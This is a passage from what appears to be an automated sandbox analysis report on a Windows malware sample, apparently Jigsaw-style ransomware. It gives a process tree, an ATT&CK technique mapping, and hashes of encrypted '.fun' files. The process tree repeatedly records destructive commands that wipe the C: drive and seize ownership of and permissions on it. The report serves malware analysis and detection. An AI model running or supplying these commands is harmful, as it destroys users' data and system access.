    PID:2640
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9068
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7192
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:7576
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11272
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:11288
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11420
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11516
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11524
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11660
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11760
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11776
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11912
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:12004
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:12012
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:12148
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:12232
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    PID:12248
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:8588
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11488
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11484
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11644
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11756
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11752
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11940
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:12080
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:12048
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:12200
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:8308
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:7232
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11396
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11420
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11644
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Modifies file permissions
    PID:11748
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11960
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11700
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    - Possible privilege escalation attempt
    PID:8968
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:9020
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11536
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11596
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11344
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    PID:11456
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:11876
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:12192
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Modifies file permissions
    PID:11928
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "C:\" /grant %username%:(F)
    3⤵
    PID:9512
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C rd /s /q "C:\"
    3⤵
    PID:11316
- - C:\Windows\SysWOW64\takeown.exe
    "takeown" /F "C:\" /R /A /D Y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:9744
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 1112
    3⤵
    - Program crash
    PID:11524
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\thirdpartyclamavinstaller.exe" "C:\Users\Admin\thirdpartyclamavinstaller.exe" & pause
  2⤵
  PID:4924
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\thirdpartyclamavinstaller0.exe" "C:\Users\Admin\thirdpartyclamavinstaller0.exe" & pause
  2⤵
  PID:2972
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\jigsaw.exe" "C:\Users\Admin\jigsaw_backup.exe" & pause
  2⤵
  PID:3504
- C:\Users\Admin\AppData\Local\Temp\jigsaw.exe
  "C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  PID:2132
- - C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
    "C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe
    3⤵
    - Executes dropped EXE
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\a.exe" "C:\Users\Admin\a_backup.exe" & pause
  2⤵
  PID:3044
- C:\Users\Admin\AppData\Local\Temp\a.exe
  "C:\Users\Admin\AppData\Local\Temp\a.exe"
  2⤵
  - Enumerates VirtualBox registry keys
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Looks for VirtualBox Guest Additions in registry
  - Looks for VMWare Tools registry key
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks system information in the registry
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:5012
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\b.exe" "C:\Users\Admin\b_backup.exe" & pause
  2⤵
  PID:2092
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\c.exe" "C:\Users\Admin\c_backup.exe" & pause
  2⤵
  PID:1632
- C:\Users\Admin\AppData\Local\Temp\c.exe
  "C:\Users\Admin\AppData\Local\Temp\c.exe"
  2⤵
  - Executes dropped EXE
  PID:3368
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\f.exe" "C:\Users\Admin\f_backup.exe" & pause
  2⤵
  PID:5092
- C:\Users\Admin\AppData\Local\Temp\f.exe
  "C:\Users\Admin\AppData\Local\Temp\f.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3612
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\l.exe" "C:\Users\Admin\l_backup.exe" & pause
  2⤵
  PID:440
- C:\Users\Admin\AppData\Local\Temp\l.exe
  "C:\Users\Admin\AppData\Local\Temp\l.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  PID:4152
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\m.exe" "C:\Users\Admin\m_backup.exe" & pause
  2⤵
  PID:2848
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\z.exe" "C:\Users\Admin\z_backup.exe" & pause
  2⤵
  PID:4560
- C:\Users\Admin\AppData\Local\Temp\z.exe
  "C:\Users\Admin\AppData\Local\Temp\z.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4632
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\of.exe" "C:\Users\Admin\of_backup.exe" & pause
  2⤵
  PID:3812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4604 -ip 4604
1⤵
PID:11700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3280 -ip 3280
1⤵
PID:11748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.fun

Filesize
720B

MD5
61947d0907c945a6df0f1d86b894e4c7

SHA1
fd488589b551ef61957bc329d1a10a4dd20481db

SHA256
cfa663ff1da533b46726d1761848a327ff515ee7dd4bb395a9430f6cbc568bdd

SHA512
296a37e91d1fbce5e951413e09b240db31eef5ff88ce783a506cb40151dfc394465e0ba617f8d2ce4310a1432b969d88873e74905012b65492cdccd11a874981

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png.fun

Filesize
7KB

MD5
a842db7ac1990b29e2c453d22188eafc

SHA1
562adae12978c15a03c541c86a930d306d1a3618

SHA256
577aceff95acfa55f729b8c56d5a5848d55d76ac0664b7ad4e32f1ffbc6729f3

SHA512
21639cb95779a49f24fa1fc74e2c26eba8040800b2f3fcba8815b41a915cb7710d2d528d00fb9d3acce8a74ce155a83e0f1b24fd7f4614934405d10211a19554

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif.fun

Filesize
7KB

MD5
f13b68445c6a611c58b69d0663adcd41

SHA1
f4405939a8ce9d73be0b9e95bc694c0e3187d4f5

SHA256
dfa70d2305ea3cc4ceedf503877087e358697aba61f28e6afe310af68dddfcee

SHA512
c2e8e3fda0588bf6bf8385c654a245a597ba146e5877943db63d0f2177833de3a1e0f6118d318071f07a2c0a107001bfeac901119e036b15ebf5dfa6b7795f28

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png.fun

Filesize
15KB

MD5
c8fc25207f8ceecd9227242be2efbac3

SHA1
46f774b5a0f7cbd381d4434ce8e50de84c3c0c12

SHA256
bab54850e29f9ebc93b283187ef71904745c380cf99f7b2fa75de22a59ed3d97

SHA512
8ebfe4584beb21ad2a82da8ad799aebb00e52b5c819775f4df6dbf6dd2435f45514cbb15747baaea6018d476f43ea2c7ba66f6103b551ccf55ae3642167bc653

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png.fun

Filesize
8KB

MD5
b5d8672c3a1c0c03ea94ed8e7545b730

SHA1
95dc280bb5e13b9979952cc20f30f6830f184901

SHA256
fca20ec5c665941480e92223fc4719aac0b3235a7f115d2574d7129e7e6ee348

SHA512
de8da4e24416eda326404a717e77a8d810aa6f995c5fd545c9da1ef8cb47fa9786628d3ac3273f165167e4ea4f63532303f07518c85f8198adbfd89f0342f7c3

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png.fun

Filesize
17KB

MD5
ce629e483860631759ed4b212ade9bfb

SHA1
f5b4a74fcd8a4c203febcbcf808d2581959ab442

SHA256
5091a8ca0d8b0b72af4059110ad2197a423e2ddf8c8cc15e6a7f468c3fb2a78e

SHA512
d530e96e76b674605c4cf5ec30288ad4ea93399021ba88d68961cee3b158aed0e56729925a025ab355a888dda8d668780723aa3decfdebbeabfb6d5109504b42

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.fun

Filesize
448B

MD5
cab6c8585046fdcc0b2600cef0cb22aa

SHA1
2b0ce8b6523310938dceeec9fb9c9d864acc2f6b

SHA256
628b2ec6f6336318df443543de6a8a1d16e3b3400753e75a54e7a68cac604720

SHA512
8a88ceb9ec69d8f3cb6ac5965d7498fecb83e9c64f18d96c385ffffd9eae8fcebdc382c8a2c4b4b45581995fd1bc77e0afb0d3c568a6ce2907543092b3e6f992

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.fun

Filesize
624B

MD5
363b1b98d976980f0af736f587e99651

SHA1
4c9dbdd0523152e757c445a0495cb0572306b5f9

SHA256
bb70106809438ed5d550b69ae3d5119ecb46c75f7d8e0dddddd18e2967df73d0

SHA512
ca1c0b3690e7c9ce985a7f6ff2af321685d365d5ce61d700d2d17afd231cce067c01372faf43e2634414e3e6aa0c1ebdcadbdcab7c46eab759d6e4e584030e7a

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.fun

Filesize
400B

MD5
296b9b5580cc931820d1a1e62c29c41a

SHA1
484d786dc7196520072ec4a4952ec96d88ed6e26

SHA256
a36df9606a73c204e04696b1930d23c3581d33876d2b1510c9d324996186247c

SHA512
58e4b6c8014c9413540733003a2075c74ce9170bfdcfc27db79b795616988d91f58b7f3234183850a24a6b38ef2b4befdc61bae828a0d50bb79e729e51e458ca

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.fun

Filesize
560B

MD5
355f9c4064151c7089fbe1126af0cb77

SHA1
b138c3b0563efc29dc3ed24180dcd46cec5819b4

SHA256
0d8584a9d9fbf7c7b0b54f69b308da3204281c93aa1bf2f83c02e129c73a987e

SHA512
cc39d40c5058cee42fd451210b64def65499a5e2abe1475426aa88b65305e3b0a7572b7a0de15756ab68660d899bfd0c28fb62c2b6920c98d0a7e1896e292905

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.fun

Filesize
400B

MD5
b9928ad5ffa158894354df8b8ff6b23f

SHA1
e228563a9873a502801dda31c3d33be880080251

SHA256
e1a2e7cd9fe8586b95860da7c13d7b9407797ab253573c24fe423c8bc4485cf7

SHA512
d18f4fe5500a0cd70092f22f414895782cb8f3f3040c627a21ddafb1295faa146bf158e8b71ed4741f53c096b13d24d1046f7c6d6753fe0fe9a72b496f1093a6

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.fun

Filesize
560B

MD5
2e7765187796a13a10d805e0ee978a6a

SHA1
c7a8e4989068703a552b2cfe13e2411a621114f2

SHA256
cf050c014f972d74e2e9ef5aab5dab5ca46fb1344d07539aa4071305f51d2b9e

SHA512
73fd7b93efc84fb8a7c63eca4b51c85a33c85db58c2e98161bb2045ad06fc60479a0cf672346a0fd9ee30ed4cd28e565310921315180400cab56561ce0f9ed40

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.fun

Filesize
400B

MD5
d86ab3c169ebf736f5109312a9ce1c27

SHA1
513eacceed79aeba7c7ef521759d65e73edb368b

SHA256
aca7c25306834d60e990bbff5a59d35171811a4cd764cd6f19ed7f3d60678a6c

SHA512
ae27bd93e06be3c9e392ad9ed852e5b06828ab298a7e91ea58411b04cc7997858f6d3e891212a044dde51307f9cf759fb18e90c6d3afa7e78ed8f404116ec0c4

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.fun

Filesize
560B

MD5
ba92eb229413a4997d609cb7c32a262b

SHA1
7e3d458cb15bdd2b4dfb48cd636b915f1e216d69

SHA256
307ed4b76842f00b9b5ccbdfee3dbe845027badaf9fefa0f270ffdb37d053195

SHA512
4d532be35dbee30672cc2734717c827cc1ba3e9961fe5068bc21b0826edfceaabbf9e8511ed60b03522fa8f02f3c028c5c815727628a29217a8a843200ae3925

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png.fun

Filesize
688B

MD5
79928359f473ca412b6619daa126ea4a

SHA1
55d1f1d741b2327b2853a26b9c55712460ab6433

SHA256
26bc3338fa8e8f825c0e8fef85c572df98afa06dfd09dcbf6be0be93a0e7644e

SHA512
6e976147cec5201ed7d9543db2b335d007dc159f571e7df373d4efd28625255c53e47d76e21ff514de08887b15995111ba68ae0b047678d5c64387465729e52e

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png.fun

Filesize
1KB

MD5
27c2ae5ec13d9be007de8f3bd3577b19

SHA1
0b4fb7f92ed8c9a72bb48a2b6ff4dd0eeac45f5c

SHA256
9bc2e43816cd6586b50b94902b7beac1291a4123b9ca38fa2f3cb6bf647cb9a8

SHA512
832d67e486247748c3eafff6c9c0b3a039203c349c31677d26361e0f66c1e0e1e671f637be9c6dc22687b7ec77cd3ac4bc1a2d7eeac3e67204b79dfc2f664e4d

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png.fun

Filesize
192B

MD5
840221d27a09a3080a93c1f4bb265f5e

SHA1
6ed12d47df1500f7ad56ce0e3e43fa803dc040c0

SHA256
9999fa3e8b7b136d9688bc0bb42a144fab43263998c28850facdcf0def8d6360

SHA512
cc4afa07c610dba58ac80779196edaf2a745c733bcbb3b1a581ddf36c0a3f4e79a70e93ee448074d3f06f25362919140288ba59e71fc21a89ba46688434db7d7

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_patterns_header.png.fun

Filesize
704B

MD5
a967c33396482152971c0a3dd54053a2

SHA1
2d8cf663746ad928d0ebfcf87af685988f540aca

SHA256
107c2a1239238755e33ce29ef7b000935ede80dc9fdf544182d01e5c330a5a6e

SHA512
63e990a4d044c2414571481e6fd40bf30d1bc59c009b6b497eef062c9b2b3443005caf0dd014055d2da08e2f7e8a12d7c324f6c63430b1bfd95d14088c9b7162

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png.fun

Filesize
8KB

MD5
a48c79d6485aa84f70909e0deac5afc6

SHA1
5885dd3d8553862554312632d40b04ecc583e09e

SHA256
02f138096bc96757a83a6b42e855007d6f4fd1c8390c220fb5f428219253d573

SHA512
3615eba5102df9ad4bc8aafa4c43ad3a43afb617f49607789c8a6c0fb80d0fc4f5a625ba27600b5e7f6ef302dfdedee3022d61ae202dfa6c319762befc31ca46

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations_retina.png.fun

Filesize
19KB

MD5
a5b25141ae69df8e8627814bc7da55e7

SHA1
862ab0471f3d3415ded16e77f2542f84023fe8ad

SHA256
bc2276d83723961e25e621e4400a2aadefb95f1e38642ba2fd8c4e7f83dda6a1

SHA512
b9b0b0c3e5bf9026e684ef38ee576aab142ccb9a19759834d30771df121a0f87167d298bfda2d341055c1949e203102e88d5195a53ab96eb18ec2c6e70d614cc

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.fun

Filesize
832B

MD5
f9d942430d103eb14bb89a8b06dd354c

SHA1
28c8f183fc1c03eb2f69dfc662c0d47f25dceb9c

SHA256
30f745264662bb65ea8e073548faa9cbb594394fe6bb8f238fd463cd4b19a16b

SHA512
51994cfee07ebe1f030eb609f5d70c42b15f7f4d7a7e7e82c44682048b405ccc52cc33aed16ac21ac189d378eb93db093e32c50ece0d1c6bb5687fa1451ffea5

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.fun

Filesize
1KB

MD5
254e6e1f919c82e7e6386148f4fd8b85

SHA1
4b16f83c625875047f0e397bd22c318e3dc401f5

SHA256
6fd7ad452179754ac6fe6ee17a1e9ca7277173e23096153ab776cb5c572f19f5

SHA512
b9d8f88e89da06a98685ef2dab1f85115defd342d09527fcdf81712b000800fa1350db0ba085e2fc9df29ba0da394346a9d2c68395a3f9509d525e155d986ca4

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.fun

Filesize
1KB

MD5
c8df49bb4bbdc9da2bcab074f61beb09

SHA1
7bec3ca11d7533d9853d2a9a6ba2dfeb7d8201a8

SHA256
ef67108356c94c9c8826ab0a667fb88add02381715a352f9be62ee92ad781647

SHA512
53b472bdc116931819173f7385d23a8becfce39f63fcd451962bc3c6d0e117fc5f2e7ae6dac3297bf778bb35b06d5d514c10dc882ed3a5d958f8f5cdd979a213

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.fun

Filesize
2KB

MD5
5a7c257c74c8c7d5352b57cde2f0b55c

SHA1
ef9cac32cb1329bef6857173abee2fff4cac3ac6

SHA256
b2a557b40c73eb81ca22b167c4a6ac1f43622c59b2d85e5f43119769c6d6b6f5

SHA512
031764f3fb1194d778a84a294df4e0509ba00e50ddefe3a6cf7a655f48219cc38e53f5c47a56646d6ea63275ed56d19328c7b82f14e717a688d6181093764928

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.fun

Filesize
2KB

MD5
2ac07813a74d6adaa3e44db55e899e09

SHA1
a0447b0b95d442c2d770987b1e007826cdae98a2

SHA256
b770a96d153a9e662d5a586e571ba9687a0995b9dccf3f50afdb5dba8da465d9

SHA512
940e4a99d233d99b1b342c4a8d032ce70f66ef0134d57b3c13f1cdde780453e32f54f442fe9255cfe73cc9e478f72f707a383a156aa924a95ffbd3cfc840a94c

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.fun

Filesize
4KB

MD5
2613b34bca30302406bbfa57c93b6c0f

SHA1
04a4e32759eb78be5d4397916bc9e51090fa4333

SHA256
53bbcb949a287d7ac25e7a31d671cd9eb11ac609f7344a38aaa5c2f165dc4093

SHA512
4c170f25c9d3238cc6572ff5522495effab28c7e0047a44eaba8939d2da46950ff9f8f1329b923d82b0b8a3e28de735dd41ebaf83711eb20b2fa52ba82f23855

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.fun

Filesize
304B

MD5
e4e7837a4f0c71864f2ed00e23aae8e0

SHA1
c35796c887fb94fc2112caf3921ba504570dde1e

SHA256
e69aa05159c50cb7dc9083dcd34a21f811aa80ca24e67eda8fca86c244d9a483

SHA512
296817bbf0f9faafa16577edb105f560be7a27ded19370efbbe9e14657fca5c202d3f19d0f001de5d9119fdef304e099bafda922135f679b487afe05e36d4fbb

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.fun

Filesize
400B

MD5
30c5fafcb889cfdfef7a7373c623221b

SHA1
e4a12b7ef07ca5780ebe205201be538a34fc6154

SHA256
b2bf549220418c47e80507084b43eeccd85c0a43f4da74de6858fc96dd3020af

SHA512
4a621fa79335711dab7dbde3bf0fd30979b15c2f48eff9b867a0cde99ddc67a97d612ea0472db9903c5cb5555800907b8a183cf499f55d186a42fe0ad6fb023b

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.fun

Filesize
1008B

MD5
3c501b84ed7912d164470fb2024d29ba

SHA1
f54ec8a32fe7a67acfcbd48e789c0b5d2c0b6816

SHA256
d1ba5eb730cc20b906290b76d64d2697896cc25ab4d782588f98c62c9b7ea1bc

SHA512
cf9adc56a6685c7f5131d703238752700cfe9b32133ee38f6e828b658dbd64af9732509a47abee3958c5cc22f3685f10cc27a1d5d76f7459b99498310fb6cdb9

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.fun

Filesize
1KB

MD5
242c795c3e07e4f7e1db97121e007727

SHA1
c0704070f2026d817b82f71878e334be06bab551

SHA256
2ab2f7f6b540d3bcab915e7626db8db6ed71736ba7da94ce2ca4366d440cd822

SHA512
8b990d5a35b324ebbd5ee6d6d88d74e783e211f3c778162dfdf1577e2d3c6cc32693117fbfd1175ad34d7bb46e05504e8ccdcdc116a6895eee31f50d583289cb

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.fun

Filesize
2KB

MD5
a06ee81cc9009bcac3c9a5af0dab2b1d

SHA1
b95ada870dd0ebfd4058b6710076d750186ca151

SHA256
c82b8a9a8fa45f93bc000a754e07e9922fc1788f9d54bcdd0b4c6869145c613e

SHA512
b4271b58a89b37e2c48584778eeb08668e2d32026f98990fb017215e854a7006184f09149e478bd95a5b15027e308b61982f5a2275b998174bdf281736edece8

Download Submit
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.fun

Filesize
848B

MD5
fe2afee9fcdf2d43940944ebd1145480

SHA1
986b8b7ce80ec8b8e223f95b508532e69cd49c05

SHA256
116b7fbce50c3c08cc73efca3439106f4f2e00012794fbad81ebff4598066a42

SHA512
b66aec41ffabc4d1566b2316de80efe3528d2ad5dd8b0030d1a127d58c0f9257c8b76ca7c301199e92213eb35f1d557a85062dc8c432e5c554590f0a91d2ceaf

Download Submit
C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.fun

Filesize
32KB

MD5
aec7bd7c96948d97d13c7df53988e89c

SHA1
7b906b88009e7509324ae92dc8a32ae4fb38626c

SHA256
15fcb7c77cf60f287e9c81ec8053a9cdd1aa8bc0413734e8a1499a9de635c6d0

SHA512
27d12f825c16d1d5349f53a23d57f71eb8d4534a1ae4af2c4eead9cda09a4440dadc518a8887a3ea818494cb6319fc82ab8147cdb85958e9b344400b7d6b2803

Download Submit
